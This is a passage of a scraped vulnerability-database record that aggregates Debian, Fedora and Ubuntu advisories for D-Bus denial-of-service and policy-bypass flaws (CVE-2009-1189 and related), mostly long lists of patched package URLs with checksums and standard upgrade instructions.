http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.2.1-5+lenny1_arm.deb\n Size/MD5 checksum: 144958 da65511355a4e4484042fd7377e2f520\n\narmel architecture (ARM EABI)\n\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.2.1-5+lenny1_armel.deb\n Size/MD5 checksum: 146562 64f4b077e7457a400ad88b8cfd6d9b57\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.2.1-5+lenny1_armel.deb\n Size/MD5 checksum: 239468 89ddd32404daff070f43848aad9369c3\n http://security.debian.org/pool/updates/main/d/dbus/dbus-x11_1.2.1-5+lenny1_armel.deb\n Size/MD5 checksum: 63572 b67421a112b6bf92b47246c2ebd4618d\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1-5+lenny1_armel.deb\n Size/MD5 checksum: 228326 096d983dcd56905b8d35a1a109dcd742\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.2.1-5+lenny1_hppa.deb\n Size/MD5 checksum: 263164 2a856048b8c09b075f089ae2551c356f\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.2.1-5+lenny1_hppa.deb\n Size/MD5 checksum: 163954 dd2a4efdbca917a569d6520be368336c\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1-5+lenny1_hppa.deb\n Size/MD5 checksum: 270676 6ada153b9ff39dfd8a75c08a2a186784\n http://security.debian.org/pool/updates/main/d/dbus/dbus-x11_1.2.1-5+lenny1_hppa.deb\n Size/MD5 checksum: 64868 5a8bc1e82107effab796c04e6c05592d\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/d/dbus/dbus-x11_1.2.1-5+lenny1_i386.deb\n Size/MD5 checksum: 64064 64e2b9c17836231e7abc0aff34690001\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.2.1-5+lenny1_i386.deb\n Size/MD5 checksum: 235620 ac4307dc10c03340beeb13eefac1f600\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1-5+lenny1_i386.deb\n Size/MD5 checksum: 230180 7ca48ece6eb966598f45394fa6f61ecb\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.2.1-5+lenny1_i386.deb\n Size/MD5 checksum: 148370 a6fef063aace9660fcd7b518a1658299\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.2.1-5+lenny1_ia64.deb\n Size/MD5 checksum: 297824 15211d3862458004a9f10b6968d839e3\n http://security.debian.org/pool/updates/main/d/dbus/dbus-x11_1.2.1-5+lenny1_ia64.deb\n Size/MD5 checksum: 68598 e8d496cdde34439f3e8545f51b875a1d\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1-5+lenny1_ia64.deb\n Size/MD5 checksum: 487536 4b94b66cd09d99250b8d78bab7a51cc3\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.2.1-5+lenny1_ia64.deb\n Size/MD5 checksum: 205560 a3943a7fde111a5fad1fb33a0b01471d\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1-5+lenny1_mips.deb\n Size/MD5 checksum: 247202 c5b66959665d900dee20b069d205db0a\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.2.1-5+lenny1_mips.deb\n Size/MD5 checksum: 257016 ca8b0fc29104a6483f2ce45346d3c2dd\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.2.1-5+lenny1_mips.deb\n Size/MD5 checksum: 150832 c89353aaf1ff0acf40379b59c903153c\n http://security.debian.org/pool/updates/main/d/dbus/dbus-x11_1.2.1-5+lenny1_mips.deb\n Size/MD5 checksum: 64498 8f61fda7a3f7adf0e3069ad4535febf1\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.2.1-5+lenny1_mipsel.deb\n Size/MD5 checksum: 256382 7a3757146955ab439ca286aa9fc6dd94\n http://security.debian.org/pool/updates/main/d/dbus/dbus-x11_1.2.1-5+lenny1_mipsel.deb\n Size/MD5 checksum: 64528 e82065ecb4221b024d0fa0f7716b3a4a\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1-5+lenny1_mipsel.deb\n Size/MD5 checksum: 246102 38f40717cb0f202e99067a484ce80848\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.2.1-5+lenny1_mipsel.deb\n Size/MD5 checksum: 150130 5658d2cdf77ad75b314f781f9630a8e3\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.2.1-5+lenny1_powerpc.deb\n Size/MD5 checksum: 157156 8ce5392e803ce8b824865362c5e7ceaf\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.2.1-5+lenny1_powerpc.deb\n Size/MD5 checksum: 243468 31c4739ae2908480d9dadf21f243a76d\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1-5+lenny1_powerpc.deb\n Size/MD5 checksum: 252104 af29662c0e472962196a03d9bcac0624\n http://security.debian.org/pool/updates/main/d/dbus/dbus-x11_1.2.1-5+lenny1_powerpc.deb\n Size/MD5 checksum: 67286 5d871cb882a468fc0d21981024b7bd5e\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.2.1-5+lenny1_sparc.deb\n Size/MD5 checksum: 145182 7493ade5ef50256253977a3c708a87dd\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1-5+lenny1_sparc.deb\n Size/MD5 checksum: 254556 8f8bc903fe5eb131a75cbfd0f282cc21\n http://security.debian.org/pool/updates/main/d/dbus/dbus-x11_1.2.1-5+lenny1_sparc.deb\n Size/MD5 checksum: 63946 4e1a64b89ca25775553e7653cf2cb3eb\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.2.1-5+lenny1_sparc.deb\n Size/MD5 checksum: 235150 7e6ab5023ad36c713a0eff40e6f60045\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 9, "modified": "2009-07-18T08:56:45", "published": "2009-07-18T08:56:45", "id": "DEBIAN:DSA-1837-1:C3DAA", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2009/msg00151.html", "title": "[SECURITY] [DSA 1837-1] New dbus packages fix denial of service", "type": "debian", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3834"], "description": " D-BUS is a system for sending messages between applications. It is used both for the systemwide message bus service, and as a per-user-login-session messaging facility. ", "modified": "2008-10-09T21:35:00", "published": "2008-10-09T21:35:00", "id": "FEDORA:24A0D208970", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 9 Update: dbus-1.2.4-1.fc9", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:31", "bulletinFamily": "software", "cvelist": ["CVE-2009-1189"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- ------------------------------------------------------------------------\r\nDebian Security Advisory DSA-1837-1 security@debian.org\r\nhttp://www.debian.org/security/ Steffen Joeris\r\nJuly 18, 2009 http://www.debian.org/security/faq\r\n- ------------------------------------------------------------------------\r\n\r\nPackage : dbus\r\nVulnerability : programming error\r\nProblem type : local\r\nDebian-specific: no\r\nCVE Id : CVE-2009-1189\r\nDebian Bug : 532720\r\n\r\n\r\nIt was discovered that the dbus_signature_validate function in\r\ndbus, a simple interprocess messaging system, is prone to a denial of\r\nservice attack. This issue was caused by an incorrect fix for\r\nDSA-1658-1.\r\n\r\nFor the stable distribution (lenny), this problem has been fixed in\r\nversion 1.2.1-5+lenny1.\r\n\r\nFor the oldstable distribution (etch), this problem has been fixed in\r\nversion 1.0.2-1+etch3.\r\n\r\nPackages for ia64 and s390 will be released once they are available.\r\n\r\nFor the testing distribution (squeeze) and the unstable distribution\r\n(sid), this problem has been fixed in version 1.2.14-1.\r\n\r\n\r\nWe recommend that you upgrade your dbus packages.\r\n\r\n\r\nUpgrade instructions\r\n- --------------------\r\n\r\nwget url\r\n will fetch the file for you\r\ndpkg -i file.deb\r\n will install the referenced file.\r\n\r\nIf you are using the apt-get package manager, use the line for\r\nsources.list as given below:\r\n\r\napt-get update\r\n will update the internal database\r\napt-get upgrade\r\n will install corrected packages\r\n\r\nYou may use an automated update by adding the resources from the\r\nfooter to the proper configuration.\r\n\r\n\r\nDebian GNU/Linux 4.0 alias etch\r\n- -------------------------------\r\n\r\nDebian (oldstable)\r\n- ------------------\r\n\r\nOldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390\r\nand sparc.\r\n\r\nSource archives:\r\n\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch3.diff.gz\r\n Size/MD5 checksum: 20482 fd114e50577aade0211a25bc05ac064d\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2.orig.tar.gz\r\n Size/MD5 checksum: 1400278 0552a9b54beb4a044951b7cdbc8fc855\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch3.dsc\r\n Size/MD5 checksum: 824 0befb91739de13f92197336b6a3f3f06\r\n\r\nArchitecture independent packages:\r\n\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-doc_1.0.2-1+etch3_all.deb\r\n Size/MD5 checksum: 1622204 67e2242179a8af1f3a7363d0d9728702\r\n\r\nalpha architecture (DEC Alpha)\r\n\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch3_alpha.deb\r\n Size/MD5 checksum: 289142 2da5aaed2ca0e1dfe4627f2d51923a1a\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch3_alpha.deb\r\n Size/MD5 checksum: 184834 a14af28f5651f06cd41f4aa8b264d486\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch3_alpha.deb\r\n Size/MD5 checksum: 378214 95128d7c15be44464dd1a785788fdc3d\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch3_alpha.deb\r\n Size/MD5 checksum: 403766 5facc50da806d2f82a1ca839e045035d\r\n\r\namd64 architecture (AMD x86_64 (AMD64))\r\n\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch3_amd64.deb\r\n Size/MD5 checksum: 279294 6b0085ce0a01a81a13b068759de269b8\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch3_amd64.deb\r\n Size/MD5 checksum: 348654 4d1f1c1d5c074be51b777b93b332eaf7\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch3_amd64.deb\r\n Size/MD5 checksum: 363928 54ed19ba7cbd0dd3475827c6e6df5acf\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch3_amd64.deb\r\n Size/MD5 checksum: 184200 e5bc33b1e7dbfea9c372a3056e3f1848\r\n\r\narm architecture (ARM)\r\n\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch3_arm.deb\r\n Size/MD5 checksum: 343960 e7c6c2269903d8dbd4422103a9e1edaf\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch3_arm.deb\r\n Size/MD5 checksum: 265322 4e7ce3fca8c685e540092e70474e6fbd\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch3_arm.deb\r\n Size/MD5 checksum: 330958 cee5e85136606605bd290035d9452f90\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch3_arm.deb\r\n Size/MD5 checksum: 183240 d7e3c477f4f4fbbc49c04b035e92ff2a\r\n\r\nhppa architecture (HP PA RISC)\r\n\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch3_hppa.deb\r\n Size/MD5 checksum: 374136 7d297f74e9fde26e726f06f321208dae\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch3_hppa.deb\r\n Size/MD5 checksum: 286074 0a55d6aa6400d4d5750ebd92e9de7aab\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch3_hppa.deb\r\n Size/MD5 checksum: 362166 013680aca7b38c66292a8727855bfc06\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch3_hppa.deb\r\n Size/MD5 checksum: 184934 061417fe2e791b5bc7abf62398b3a8a8\r\n\r\ni386 architecture (Intel ia32)\r\n\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch3_i386.deb\r\n Size/MD5 checksum: 335758 605f4f911d8445b74cbd46ede0fcfb89\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch3_i386.deb\r\n Size/MD5 checksum: 268688 c64ca51e9e04d1e961a8db7132ba4e08\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch3_i386.deb\r\n Size/MD5 checksum: 184134 58672102a58bca326f4ba09c5bf3666a\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch3_i386.deb\r\n Size/MD5 checksum: 348012 ae8f836c9e5b631eb421f3b86dc78f49\r\n\r\nmips architecture (MIPS (Big Endian))\r\n\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch3_mips.deb\r\n Size/MD5 checksum: 370052 f8ea51037f985d6b8f2a288b9a813ccd\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch3_mips.deb\r\n Size/MD5 checksum: 359844 b0b0956206921cff260c531aa9286f21\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch3_mips.deb\r\n Size/MD5 checksum: 184240 4dd808980afe395d6909549614fab214\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch3_mips.deb\r\n Size/MD5 checksum: 272764 7ceea85232267e0a80f4fd5cb38ddf09\r\n\r\nmipsel architecture (MIPS (Little Endian))\r\n\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch3_mipsel.deb\r\n Size/MD5 checksum: 369664 07d0e90fc376acf855563baec0293856\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch3_mipsel.deb\r\n Size/MD5 checksum: 184260 f81b2223f912a359a4fd7bc1f61ba7e4\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch3_mipsel.deb\r\n Size/MD5 checksum: 358830 947820464929873955f7f6a427403838\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch3_mipsel.deb\r\n Size/MD5 checksum: 272442 3d19769e8260b3d434e6dd577d72c5c0\r\n\r\npowerpc architecture (PowerPC)\r\n\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch3_powerpc.deb\r\n Size/MD5 checksum: 184222 c06ffd6735f13d9f6c9301a0dd487efd\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch3_powerpc.deb\r\n Size/MD5 checksum: 335910 9fe78e085108bbacb7f04566247aa51e\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch3_powerpc.deb\r\n Size/MD5 checksum: 271718 021c33a25a85bcdc394fc0c5af784256\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch3_powerpc.deb\r\n Size/MD5 checksum: 353656 9e40213397ea8306184da6c8e0bcb070\r\n\r\nsparc architecture (Sun SPARC/UltraSPARC)\r\n\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch3_sparc.deb\r\n Size/MD5 checksum: 184266 d82e92039c32386a69e0f1b119820ae8\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch3_sparc.deb\r\n Size/MD5 checksum: 265144 d7f6e34015d0adc757942c6d1dae3c56\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch3_sparc.deb\r\n Size/MD5 checksum: 341300 3bb2b297ebd12d562b0185b6b58196a8\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch3_sparc.deb\r\n Size/MD5 checksum: 337130 1b9530365393919e15ffce3a695441ea\r\n\r\n\r\nDebian GNU/Linux 5.0 alias lenny\r\n- --------------------------------\r\n\r\nDebian (stable)\r\n- ---------------\r\n\r\nStable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc,\r\ns390 and sparc.\r\n\r\nSource archives:\r\n\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1-5+lenny1.dsc\r\n Size/MD5 checksum: 1608 e084fe269b41c84cdeaafae2b2633e9f\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1.orig.tar.gz\r\n Size/MD5 checksum: 1406833 b57aa1ba0834cbbb1e7502dc2cbfacc2\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1-5+lenny1.diff.gz\r\n Size/MD5 checksum: 39470 6b875822ae5036ba8bf83f2fae11fbf0\r\n\r\nArchitecture independent packages:\r\n\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-doc_1.2.1-5+lenny1_all.deb\r\n Size/MD5 checksum: 1830232 317e72d84e019f0006d84e9579fa4b66\r\n\r\nalpha architecture (DEC Alpha)\r\n\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1-5+lenny1_alpha.deb\r\n Size/MD5 checksum: 380740 b75e7906989484738737bc2e5e6bf66a\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.2.1-5+lenny1_alpha.deb\r\n Size/MD5 checksum: 290338 fa8f5deeed2593a790283210375bde43\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.2.1-5+lenny1_alpha.deb\r\n Size/MD5 checksum: 170160 810c545ad2bf6212fcb745f10f3d39c9\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus-x11_1.2.1-5+lenny1_alpha.deb\r\n Size/MD5 checksum: 66942 c810abd2e002daefa1f24942367208ce\r\n\r\namd64 architecture (AMD x86_64 (AMD64))\r\n\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.2.1-5+lenny1_amd64.deb\r\n Size/MD5 checksum: 259300 9086503f08d3a4970c966cb1461b8309\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.2.1-5+lenny1_amd64.deb\r\n Size/MD5 checksum: 162880 12a802692ae3d1774a5cb2a55fee7abe\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus-x11_1.2.1-5+lenny1_amd64.deb\r\n Size/MD5 checksum: 64710 62a4fbb57742faed71a853cd7c6d5443\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1-5+lenny1_amd64.deb\r\n Size/MD5 checksum: 249006 966d8f20171594a83abd09251c277dd1\r\n\r\narm architecture (ARM)\r\n\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus-x11_1.2.1-5+lenny1_arm.deb\r\n Size/MD5 checksum: 63812 f9acaf50dd1440312f9b3eb9e8ce5665\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1-5+lenny1_arm.deb\r\n Size/MD5 checksum: 223424 20befb04db3b6ae82fb152354be8cf1f\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.2.1-5+lenny1_arm.deb\r\n Size/MD5 checksum: 238514 0369f89685fa04a26ba050b5ae718368\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.2.1-5+lenny1_arm.deb\r\n Size/MD5 checksum: 144958 da65511355a4e4484042fd7377e2f520\r\n\r\narmel architecture (ARM EABI)\r\n\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.2.1-5+lenny1_armel.deb\r\n Size/MD5 checksum: 146562 64f4b077e7457a400ad88b8cfd6d9b57\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.2.1-5+lenny1_armel.deb\r\n Size/MD5 checksum: 239468 89ddd32404daff070f43848aad9369c3\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus-x11_1.2.1-5+lenny1_armel.deb\r\n Size/MD5 checksum: 63572 b67421a112b6bf92b47246c2ebd4618d\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1-5+lenny1_armel.deb\r\n Size/MD5 checksum: 228326 096d983dcd56905b8d35a1a109dcd742\r\n\r\nhppa architecture (HP PA RISC)\r\n\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.2.1-5+lenny1_hppa.deb\r\n Size/MD5 checksum: 263164 2a856048b8c09b075f089ae2551c356f\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.2.1-5+lenny1_hppa.deb\r\n Size/MD5 checksum: 163954 dd2a4efdbca917a569d6520be368336c\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1-5+lenny1_hppa.deb\r\n Size/MD5 checksum: 270676 6ada153b9ff39dfd8a75c08a2a186784\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus-x11_1.2.1-5+lenny1_hppa.deb\r\n Size/MD5 checksum: 64868 5a8bc1e82107effab796c04e6c05592d\r\n\r\ni386 architecture (Intel ia32)\r\n\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus-x11_1.2.1-5+lenny1_i386.deb\r\n Size/MD5 checksum: 64064 64e2b9c17836231e7abc0aff34690001\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.2.1-5+lenny1_i386.deb\r\n Size/MD5 checksum: 235620 ac4307dc10c03340beeb13eefac1f600\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1-5+lenny1_i386.deb\r\n Size/MD5 checksum: 230180 7ca48ece6eb966598f45394fa6f61ecb\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.2.1-5+lenny1_i386.deb\r\n Size/MD5 checksum: 148370 a6fef063aace9660fcd7b518a1658299\r\n\r\nia64 architecture (Intel ia64)\r\n\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.2.1-5+lenny1_ia64.deb\r\n Size/MD5 checksum: 297824 15211d3862458004a9f10b6968d839e3\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus-x11_1.2.1-5+lenny1_ia64.deb\r\n Size/MD5 checksum: 68598 e8d496cdde34439f3e8545f51b875a1d\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1-5+lenny1_ia64.deb\r\n Size/MD5 checksum: 487536 4b94b66cd09d99250b8d78bab7a51cc3\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.2.1-5+lenny1_ia64.deb\r\n Size/MD5 checksum: 205560 a3943a7fde111a5fad1fb33a0b01471d\r\n\r\nmips architecture (MIPS (Big Endian))\r\n\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1-5+lenny1_mips.deb\r\n Size/MD5 checksum: 247202 c5b66959665d900dee20b069d205db0a\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.2.1-5+lenny1_mips.deb\r\n Size/MD5 checksum: 257016 ca8b0fc29104a6483f2ce45346d3c2dd\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.2.1-5+lenny1_mips.deb\r\n Size/MD5 checksum: 150832 c89353aaf1ff0acf40379b59c903153c\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus-x11_1.2.1-5+lenny1_mips.deb\r\n Size/MD5 checksum: 64498 8f61fda7a3f7adf0e3069ad4535febf1\r\n\r\nmipsel architecture (MIPS (Little Endian))\r\n\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.2.1-5+lenny1_mipsel.deb\r\n Size/MD5 checksum: 256382 7a3757146955ab439ca286aa9fc6dd94\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus-x11_1.2.1-5+lenny1_mipsel.deb\r\n Size/MD5 checksum: 64528 e82065ecb4221b024d0fa0f7716b3a4a\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1-5+lenny1_mipsel.deb\r\n Size/MD5 checksum: 246102 38f40717cb0f202e99067a484ce80848\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.2.1-5+lenny1_mipsel.deb\r\n Size/MD5 checksum: 150130 5658d2cdf77ad75b314f781f9630a8e3\r\n\r\npowerpc architecture (PowerPC)\r\n\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.2.1-5+lenny1_powerpc.deb\r\n Size/MD5 checksum: 157156 8ce5392e803ce8b824865362c5e7ceaf\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.2.1-5+lenny1_powerpc.deb\r\n Size/MD5 checksum: 243468 31c4739ae2908480d9dadf21f243a76d\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1-5+lenny1_powerpc.deb\r\n Size/MD5 checksum: 252104 af29662c0e472962196a03d9bcac0624\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus-x11_1.2.1-5+lenny1_powerpc.deb\r\n Size/MD5 checksum: 67286 5d871cb882a468fc0d21981024b7bd5e\r\n\r\nsparc architecture (Sun SPARC/UltraSPARC)\r\n\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.2.1-5+lenny1_sparc.deb\r\n Size/MD5 checksum: 145182 7493ade5ef50256253977a3c708a87dd\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1-5+lenny1_sparc.deb\r\n Size/MD5 checksum: 254556 8f8bc903fe5eb131a75cbfd0f282cc21\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus-x11_1.2.1-5+lenny1_sparc.deb\r\n Size/MD5 checksum: 63946 4e1a64b89ca25775553e7653cf2cb3eb\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.2.1-5+lenny1_sparc.deb\r\n Size/MD5 checksum: 235150 7e6ab5023ad36c713a0eff40e6f60045\r\n\r\n\r\n These files will probably be moved into the stable distribution on\r\n its next update.\r\n\r\n- ---------------------------------------------------------------------------------\r\nFor apt-get: deb http://security.debian.org/ stable/updates main\r\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\r\nMailing list: debian-security-announce@lists.debian.org\r\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (GNU/Linux)\r\n\r\niEYEARECAAYFAkphji4ACgkQ62zWxYk/rQeUUQCgoAAlzCip8iT8Da1eYQ7VzKVn\r\nuBgAn0FFJcLPYuriEVVJkrlBhSjKwbE+\r\n=UcAL\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2009-07-20T00:00:00", "published": "2009-07-20T00:00:00", "id": "SECURITYVULNS:DOC:22190", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22190", "title": "[SECURITY] [DSA 1837-1] New dbus packages fix denial of service", "type": "securityvulns", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:33", "bulletinFamily": "software", "cvelist": ["CVE-2009-1189"], "description": "Denial of Service via dbus_signature_validate.", "edition": 1, "modified": "2009-07-20T00:00:00", "published": "2009-07-20T00:00:00", "id": "SECURITYVULNS:VULN:10085", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10085", "title": "dbus DoS", "type": "securityvulns", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "ubuntu": [{"lastseen": "2020-07-09T01:36:52", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1189"], "description": "It was discovered that the D-Bus library did not correctly validate \nsignatures. If a local user sent a specially crafted D-Bus key, they could \nspoof a valid signature and bypass security policies.", "edition": 5, "modified": "2009-07-13T00:00:00", "published": "2009-07-13T00:00:00", "id": "USN-799-1", "href": "https://ubuntu.com/security/notices/USN-799-1", "title": "D-Bus vulnerability", "type": "ubuntu", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-07-08T23:42:06", "bulletinFamily": "unix", "cvelist": ["CVE-2008-0595", "CVE-2008-3834"], "description": "Havoc Pennington discovered that the D-Bus daemon did not correctly \nvalidate certain security policies. If a local user sent a specially \ncrafted D-Bus request, they could bypass security policies that had a \n\"send_interface\" defined. (CVE-2008-0595)\n\nIt was discovered that the D-Bus library did not correctly validate \ncertain corrupted signatures. If a local user sent a specially crafted \nD-Bus request, they could crash applications linked against the D-Bus \nlibrary, leading to a denial of service. 